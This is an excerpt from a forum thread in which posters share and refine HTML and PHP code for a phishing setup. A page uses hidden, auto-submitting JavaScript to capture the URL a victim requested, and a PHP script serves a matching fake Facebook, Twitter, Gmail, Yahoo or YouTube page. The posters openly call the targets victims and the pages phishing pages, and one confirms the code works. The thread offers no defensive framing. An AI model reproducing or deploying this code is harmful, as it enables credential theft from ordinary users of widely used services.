Link to comment
Share on other sites

  • 2 weeks later...

It looks like the "HTTP_HOST" variable isnt set by either this version of php or by the server (or whatever sets it lol)

I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled...

index.html

&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form action="index.php" method="POST" name="theform"&gt;
&lt;input type="text" name="host" value=""/&gt;
&lt;/form&gt;
&lt;script type="text/javascript"&gt;
document.theform.host.setAttribute("value",window.location);
document.theform.submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

index.php (named it index.php because it doesnt redirect, it displays the contents of the phishing pages instead of redirecting to them)

&lt;?php
error_reporting(0);
$ref = $_POST['host'];

if (strpos($ref, "facebook.com"))		{ include('facebook.html'); }
else if (strpos($ref, "twitter.com"))		{ include('twitter.html'); }
else if (strpos($ref, "gmail.com") || 
	  strpos($ref, "mail.google.com"))	{ include('gmail.html'); }
else if (strpos($ref, "yahoo.com"))		{ include('yahoo.html'); }
else if (strpos($ref, "youtube.com"))		{ include('youtube.html'); }
else						{ include('peets.html'); }
?&gt;

That worked perfectly, great work. my only change was to avoid the textbox containing the url from being displayed by adding:

document.theform.host.style.visibility='hidden';

&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form action="index.php" method="POST" name="theform"&gt;
&lt;input type="text" name="host" value=""/&gt;
&lt;/form&gt;
&lt;script type="text/javascript"&gt;
document.theform.host.style.visibility='hidden';
document.theform.host.setAttribute("value",window.location);
document.theform.submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...